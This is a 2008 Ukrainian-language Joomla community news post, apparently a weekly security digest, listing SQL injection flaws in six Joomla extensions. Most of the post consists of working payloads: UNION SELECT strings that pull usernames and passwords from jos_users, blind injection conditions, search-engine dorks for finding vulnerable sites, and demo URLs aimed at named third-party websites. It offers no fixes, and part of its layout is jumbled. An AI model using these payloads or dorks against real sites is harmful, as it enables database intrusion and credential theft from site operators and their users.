Joomla! Україна

Дізнавайся про останні події української та світової спільноти
  • Версія Joomla! від 22.05.2018
  • 1229 користувачі
  • 60 записи в блогах
  • 788 новини та статті
     

Тижневик безпеки №01

28.12.2008, 03:53  |  Новини розширень Joomla!  |  Денис Носов Друк |e-mail

За тиждень, який минає знайдено вразливості у наступних розширеннях: mdigg 2.2.8, Live Ticker 1.0, Ice Gallery 0.5b2, com_allhotels, com_lowcosthotels, Volunteer 2.0.

com_volunteer (job_id) SQL-ін’єкція

Приклад:

http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Експойт:

-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

Демо:

http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1 

    com_lowcosthotels (id) SQL-ін’єкція

    Скрипт: http://www.joomlahbs.com/DorK: inurl:index.php?option=com_lowcosthotelsДемо:

      com_allhote

      http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
      http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4%20%20%20
      http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

      ls (id) SQL-ін’єкція

      Скрипт:

      http://www.joomlahbs.com/  та  http://www.leveltensolutions.net/spa/

      DorK: inurl:index.php?option=com_allhotels

      Демо:

      http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5 

        com_ice (catid) SQL-ін’єкція

        Приклад:

        http://localHost/path/index.php?option=com_ice&⁞catid=1[SQL code]

        SQL код:

        and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96

        com_liveticker (tid) SQL-ін’єкція

        Приклад:

        http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]

        Демо:

        http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)
        http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)

          com_mdigg (category) SQL-ін’єкція

          Приклад:

          http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]

          Експойт:

          -9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

          Додати коментар


          Захисний код
          Оновити